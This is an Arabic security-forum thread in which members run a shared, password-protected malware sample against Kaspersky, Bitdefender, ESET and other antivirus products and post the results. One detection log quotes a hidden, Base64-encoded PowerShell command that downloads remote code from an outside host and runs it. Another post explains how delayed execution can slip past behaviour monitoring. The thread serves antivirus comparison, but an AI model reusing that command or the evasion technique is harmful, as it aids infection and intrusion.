• [ يمنع ] طرح أي موضوع يحوي على كراكات أو باتشات او كيجنات من غير فحصها عبر موقع فيروس توتال [ virustotal.com ] وطرح رابط الفحص ضِمن الموضوع.

تشفيرة ملف خبيث لتجربته بالتشغيل بتاريخ اليوم 14-11-2024

Ramy Badraan

Ramy BadraanRamy Badraan is verified member.

مراقب قسم الحماية وانظمة لينكس -مصمم بنرات المنتدى
طـــاقم الإدارة
فريق الدعم لقسم الحماية
نجم الشهر
فريق التصميم
كبار الشخصيات
إنضم
26 أكتوبر 2008
المشاركات
3,102
مستوى التفاعل
6,479
النقاط
3,600
الإقامة
مصر
الموقع الالكتروني
www.facebook.com
غير متصل
JqZJplx.gif


ملف مطلوب تجربته بالتشغيل
حتى لو اكتشفه بفك الضغط او الفحص للاشتباه نظراً للتوقيع المبهم
اوقف الفحص وجرب التشغيل
(ممنوع الرفع على فايرس توتال)


الخبراء بس هما اللى يجربوا
وتجميد النظام ضرورى جدا

Tiq9c81.png


P4a2E63.png



يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي



or

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي




باسوورد فك الضغط

infected
 

توقيع : Ramy BadraanRamy Badraan is verified member.
@khaled_jtv
احتمال يتخطى بت ديفندر على فكرة
او هيكتشفه بعد ما يشتغل شوية مش على طول
علشان بت ديفندر بيحلل سلوك بالتايم لاين بتاع الملف
ودى ميزة بس فى نفس الوقت عيب قااااااااااااتل
 
توقيع : Ramy BadraanRamy Badraan is verified member.
بالفحص مكتشف من النود
1731587620702.webp



اوقفت الحماية الفعلية وشغلت الملف


1731587668287.webp
 
توقيع : احمد المخاتره

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

لا نود بدأ يظبط نفسه جامد اليومين دول بعد الاصدار الاخير اللى نزل اخر شهر 10 تقريباً
محرك الفحص اتطور وال hips كمان
طبعاً بعد ما كاسبر وقع كل الامريكين بقوا يشتروا النود وبت ديفندر والبلية لعبت معاهم :tearsofjoy: :tearsofjoy:
علشان كدة تلاقى مستواهم بقى كويس الفترة دى
الفلوس بتغير
 
توقيع : Ramy BadraanRamy Badraan is verified member.
الكاسبرسكي


1731588371004.webp


1731588195349.webp
 
توقيع : احمد المخاتره

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

انا مقولتش هواوى يجرب
انا قولت بت ديفندر :222rolleyes: :222rolleyes:
وبعدين دة بالفحص انا عايز بالتشغيل
ملف زى دة لو جبت كلب حراسة هيمسكه من التعديل اللى معمول فيه
 
توقيع : Ramy BadraanRamy Badraan is verified member.

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

اكتفي بالفحص ai فقط. بالتشغيل اترك الامر لبت ديفندر
 
توقيع : tiktoshitiktoshi is verified member.

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

طب كابتن
تعرف ابو الهول؟؟ بيقولك خد دول 👇👇 :tearsofjoy: :tearsofjoy:
3 ملفات عنب

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي


وجرب عليهم كاسبر يا باشا @احمد المخاتره
غالبا كاسبر لما يشوفهم هيمسح نفسه من على الجهاز ويعملك بلوك :tearsofjoy::tearsofjoy:
 
توقيع : Ramy BadraanRamy Badraan is verified member.
ملف obs
Detection: HEUR:Trojan/Python.ShellLoader.ap
Detection ID: 69D4249C59C8326D
Path: C:\Users\tikk\Desktop\obs\obs.exe
Action: Read
Result: deleted

Process ID: 6400
Process: C:\Windows\explorer.exe
Process Command line: C:\Windows\Explorer.EXE
Parent Process ID: 6360
Parent: C:\Windows\System32\userinit.exe



ملف 11


Detection: Trojan/PS.Encpe.a
Detection ID: 2B51E8496B7C9729
Path: PowerShell_3FC5E67E7A2EE308AF0369D0E187775E36315E3E
Action: Execute
Result: cleaned

Process ID: 6232
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command line: powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwAuAHQAeAB0ACcAKQA=
Parent Process ID: 9632
Parent: C:\Windows\System32\cmd.exe


ملف 33 به مشكل لم اتحقق منه شوة انا مستعجل بعد شوي راجع ليكم خهههههههههههههه

联想截图_20241114133306.webp
 
توقيع : tiktoshitiktoshi is verified member.

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

يعنى هى دى الحجة؟؟
عنيا يا صاحبى خد ملف ال dll اللى هو محتاجه
حط الاتنين فى فولدر واحد وجرب التشغيل تانى

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

 
توقيع : Ramy BadraanRamy Badraan is verified member.
توقيع : tiktoshitiktoshi is verified member.

tiktoshi

بيتدفندر ؟ تم تجاوزه ؟
أعتقد ان الفكرة ان خاصية advanced threat defence تصنف الملف حين التشغيل لأول مرة بعد ذلك تثق بالملف وسلوكياته هنا يكون المخترق مسبقاََ برمجه على انه يشتغل بعد اسبوع او شهر وهنا برنامج الحماية قد يكون وثق مسبقا بالملف ولن يفحصه مجدداََ
 
التعديل الأخير:

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

يا عينى
معلش
قولتلك هواوى محتاج اسكرينة مسمعتش كلامى :222D
 
توقيع : Ramy BadraanRamy Badraan is verified member.

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

لا يحبيبي هواوي كان مشعول عشانك
اتفضل
تحديث جديد للمحرك بعد تجربة هههه
مش قاعدة دا محرك
联想截图_20241115014239.webp
 
توقيع : tiktoshitiktoshi is verified member.

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

اه بعد ما جربت اول مرة راح تخطاه فهو بقى راح رفع الملفات على السحابة بتاعته فالدعم فحصوا الملفات لقيوها ملغومة راح منزلينهم فى التحديث
خطة فى منتهى الذكاء :tearsofjoy:
 
توقيع : Ramy BadraanRamy Badraan is verified member.

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

انا معك انها نقطة ضعف
على فكره البت تطور اليومين دول بشكل
ممتاز
تحياتي
 
التعديل الأخير:

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

هواوي سيضيف 6 طبقات عشان برامج الفدية
دا هواوي مش فاصل شحن على طول هههه مثل زي البرامج لي فصلت شحن و عاد بعتمد على باور بانك وافيرا و افاست و بولجارد بجنبها هههه
بولجارد سيستدبل ماكان دييب جارد في f-secure
:222p:222p
 
توقيع : tiktoshitiktoshi is verified member.
توقيع : Ramy BadraanRamy Badraan is verified member.

يجب عليك تسجيل الدخول أو التسجيل لمشاهدة الرابط المخفي

يا عم خليه يضيف براحته
عقبال ما يبقى برنامج حماية يا رب
انا بتمناله الخير زى ما بتمناه لكومودو بالظبط
 
توقيع : Ramy BadraanRamy Badraan is verified member.
يجب تسجيل الدخول أو التسجيل كي تتمكن من الرد هنا.
عودة
أعلى